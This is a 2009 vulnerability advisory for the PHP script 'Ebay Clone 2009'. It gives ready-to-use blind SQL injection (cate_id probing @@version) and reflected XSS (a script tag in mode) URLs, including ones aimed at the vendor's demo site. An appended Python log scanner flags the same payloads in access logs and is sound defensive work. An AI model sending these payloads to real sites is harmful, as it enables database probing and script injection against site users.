# Title : Ebay Clone 2009 (XSS/bSQL) Multiple Remote Vulnerabilities
# Published : 2009-07-10
# Author : Moudi
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
IN THE NAME OF ALLAH
==============================================================================
[»] I'm back <3 VB6
==============================================================================
[»] Ebay Clone 2009 Multiple Remote Vulnerabilities
==============================================================================
[»] Script: [ Ebay Clone 2009 ]
[»] Language: [ PHP ]
[»] Download: [ http://www.ebayclonescript.com/ ]
[»] Founder: [ Moudi or SixSo <m0udi@9.cn> ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man...]
[»] Team: [ EvilWay ]
[»] SiteWeb: [ Visit - www.opensc.ws ]
[»] Price: [ 99$ ]
###########################################################################
===[ Exploit BLIND SQL ]===
[»] http://www.site.com/patch/category.php?view=list&cate_id=[BLIND]
[»] http://ebayclonescript.com/ebayclone2009/category.php?view=list&cate_id=1+AND%20SUBSTRING(@@version,1,1)=5
===[ Exploit XSS ]===
[»] http://www.site.com/patch/search.php?mode=[XSS]
[»] http://ebayclonescript.com/ebayclone2009/search.php?mode=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
Note: this script has some other blind SQL and XSS issues, but I am too tired to do them all :D
Author: Moudi
###########################################################################
# www.Syue.com [2009-07-10]
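
A log-review check for the two parameters named above, added here as an example and not part of the original advisory or of the Ebay Clone 2009 code. It assumes combined-format web access logs and that cate_id is normally a plain decimal category id; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined format, documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jul/2009:10:00:01 +0000] "GET /ebayclone2009/category.php?view=list&cate_id=7 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Jul/2009:10:00:07 +0000] "GET /ebayclone2009/category.php?view=list&cate_id=1+AND%20SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Jul/2009:10:00:09 +0000] "GET /ebayclone2009/search.php?mode=%22%3E%3Cscript%3Ealert(0)%3C/script%3E HTTP/1.1" 200 2048',
    '198.51.100.2 - - [10/Jul/2009:10:00:12 +0000] "GET /ebayclone2009/search.php?mode=advanced HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r'[0-9]+')      # assumption: a valid cate_id is digits only
MARKUP_CHARS = set('<>"\'')         # characters that can break out of HTML context


def classify(line):
    """Return 'sqli-cate_id', 'xss-mode' or None for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    script = url.path.rsplit('/', 1)[-1]
    # parse_qs URL-decodes values, so %20, + and %3C are seen as the app sees them
    params = parse_qs(url.query, keep_blank_values=True)
    if script == 'category.php':
        # anything other than a plain decimal integer is unexpected input
        if any(not INT_RE.fullmatch(v) for v in params.get('cate_id', [])):
            return 'sqli-cate_id'
    if script == 'search.php':
        # markup or quote characters in mode would be reflected into the page
        if any(MARKUP_CHARS & set(v) for v in params.get('mode', [])):
            return 'xss-mode'
    return None


def scan(lines):
    """Return (client_ip, finding) for every flagged line, in log order."""
    hits = ((line.split(' ', 1)[0], classify(line)) for line in lines)
    return [(ip, finding) for ip, finding in hits if finding]


if __name__ == '__main__':
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```

The same two rules (integer-only cate_id, no markup characters in mode) describe the input validation and output encoding the affected pages are missing.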